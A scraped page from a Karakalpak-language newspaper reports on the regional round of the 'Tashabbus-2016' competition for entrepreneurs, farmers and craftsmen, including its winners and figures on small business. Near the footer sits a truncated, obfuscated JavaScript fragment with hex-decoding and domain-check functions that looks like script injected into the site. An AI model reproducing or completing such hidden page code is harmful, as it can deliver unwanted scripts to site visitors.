Еркин Қарақалпақстан Вести Каракалпакстана 01:35:50, 02.06.2020
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

ИЙГИЛИКЛИ ИСЛЕРГЕ ТАЛПЫНДЫРАТУҒЫН ТАҢЛАЎ

Көпшиликке мәлим, мәмлекетимизде ҳәр жылы республикамыз исбилерменлери, фермерлери ҳәм өнерментлериниң қатнасыўында Өзбекистан Республикасы Президенти саўғасы ушын «Ташаббус» таңлаўы өткерилип, бул таңлаў киши бизнес ўәкиллериниң  исбилерменлик тараўындағы басламаларын қоллап-қуўатлаў ҳәм хошаметлеўдиң өзине тән бир көриниси болып табылады.

16-март күни пайтахтымызда «Ташаббус-2016» таңлаўының республикалық басқышы болып өтти. Оған усы таңлаўдың районлық ҳәм қалалық бас­қышларында жеңимпаз бол­ған 44 фермер, исбилермен ҳәм өнерментлер қатнасты.

Бул таңлаў — мәмлекетимиз экономикасында болып атырған унамлы өзгерислерди көрсететуғын, киши бизнес ҳәм жеке исбилерменликти қоллап-қуўатлаў ҳәм оларды хошаметлеў бойынша оғада үлкен әҳми­йетке ийе болып табылады.

Таңлаў Қарақалпақстан Республикасы Министрлер Кеңеси, Өзбекистан Саўда-санаат палатасы Қарақалпақстан Республикасы басқармасы, Қарақалпақстан Республикасы Фермерлер Кеңеси ҳәм «Өнермент» бирлеспесиниң республикалық басқармаларының шөлкемлестириўинде болып өтти.

Дәслеп Нөкис қалалық ХБМХМТ ҳ ШБ не қараслы 1-санлы балалар ҳәм жас өспиримлер спорт мектебинде «Ташаббус-2016» таңлаўы қатнасыўшылары тәрепинен ислеп шығарылған өнимлердиң көргизбеси болып өтип, оған исбилерменлер ҳәм өнерментлер өзлериниң азық-аўқатлық өнимлери, ки­йим-кеншеклер, үй-руўзыгершилик бу­йымлары, қурылыс материаллары, фермерлеримиз өзлери жетистирген аўыл хожалық ҳәм шарўашылық өнимлерин кең жәмийетшилик нәзерине усынды.

Илаждың ашылыў мәресиминде Қарақалпақстан Республикасы Жоқарғы Кеңесиниң комитет баслығы Б.Нурабуллаев, Республика Министрлер Кеңеси Баслығының орынбасары М.Мамутов, Республика фермерлер Кеңесиниң баслығы, Өзбекистан Қаҳарманы С.Сейтназаров, Өзбе­кистан Саўда-санаат палатасы Қарақалпақстан Республикасы басқармасы баслығы Х.Қайыпназаровлар сөз сөйледи.

Шығып сөйлегенлердиң атап өткениндей,  киши бизнес ҳәм жеке исбилерменликти, фермерлик ҳәрекетин қоллап-қуўатлаў, исбилерменлердиң билим ҳәм кәсиплик шеберлигин жетилистириў ҳәм олардың алдын­ғы тәжирийбелерин ен жайдырыўда бул таңлаў айрықша  әҳмийетке ийе. Усындай илажлардың нәтийжесинде жеке сектордың елимиз экономикасындағы  үлеси жылдан-жылға  артып бармақта.

Исбилерменлер тәрепинен тапсырылатуғын есабатлардың қысқартылыўы, олар­ға берилип атырған жеңиллетилген кредитлердиң артыўы ҳәм бирден-бир салық төлеминиң жылдан-жылға пәсейиўи нәтийжесинде киши бизнестиң жалпы аймақлық өнимдеги үлеси 2015-жылы 64,6 процентти, санаатта 39,1, халық бәнтлигинде 75 процентти қурады. 2015-жылы 1146 жаңа киши бизнес субъектлери шөлкемлестирилип, олардың саны 10617 ге жетти.

Әсиресе, колледж питкериўшилериниң исбилерменлик жумысларын қоллап-қуўатлаў мақсетинде 2015-жылы коммерциялық банклер тәрепинен колледж питкериўшилерине 8 миллиард 638 миллион сум кредит қаржылары ажыратылған  болса, соның 3 миллиард 950 миллион сумы ҳаял-қызларға берилген. Ал, быйыл болса, елимиз жасларына коммерциялық банклер тәрепинен 11 миллиард 310 миллион сум муғдарында қаржы ажыратылыўы белгиленген.

— Ҳүкиметимиз тәрепинен киши бизнес ҳәм жеке исбилерменлик тараўына қаратылып атырған айрықша итибардың нәтийжесинде елимиз жаслары өзлериниң исбилерменлик жумысларын баслаў имканиятына ийе болды десем, асыра айт­қан болмайман. Әлбетте, сол жаслар қатарында мен де 2014-жылы «Оралбай-Нукус» атлы шаңарақлық кәрханасын шөлкемлестирип, халқымызға темир ҳәм ағаш өнимлеринен ҳәр қыйлы хожалық тутыныў буйымларын ислеп келмектемен,-дейди таңлаўдың «Ең жақсы жас исбилермен» номинациясы жеңимпазы П.Сержанов.

Күнниң екинши ярымында Бердақ атындағы Қарақалпақ мәмлекетлик сазлы театрында «Ташаббус-2016» жеңимпазларын сыйлықлаў мәресими болып өтип, онда таңлаўдың тийкар­ғы бағдарлары ҳәм бас­қа да бир неше номинациялар бо­йынша жеңимпазлар анықланды. Тийкарғы «Ең жақсы исбилермен» бағдарында Нөкис қаласынан «Муратбек мебель» ЖШЖ баслығы М.Таңирбергенов, «Ең жақсы фермер» бағдарында Тахтакөпир районынан «Қаҳарман-Тахта» фермер хожалығы баслығы Ж.Адилов, «Ең жақсы өнермент» бағдарында болса, Кегейли районынан жеке исбилермен Д.Адильчаевалар биринши орынға ылайық деп табылды   ҳәм 24-25-март күнлери Ташкент қаласында болып өтетуғын жуўмақлаўшы бас­қыш­қа жолламаны қолға киргизип, шөлкемлестириўшилер тәрепинен арнаўлы диплом ҳәм баҳалы саў­ғалар менен сыйлықланды.

«Ташаббус-2016» таңлаў-жарысының Қарақалпақстан Республикалық басқышы республикамызға белгили мәденият хызметкерлери ҳәм жас атқарыўшыларының концерт бағдарламасы менен жуўмақланды.

Р.АРЗИЕВ,

арнаўлы хабаршымыз.

СҮЎРЕТЛЕРДЕ: «Ташаббус-2016» таңлаў-жарысынан көринислер.

Ж.ЖАҚСЫМУРАТОВтың түсирген сүўретлери.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF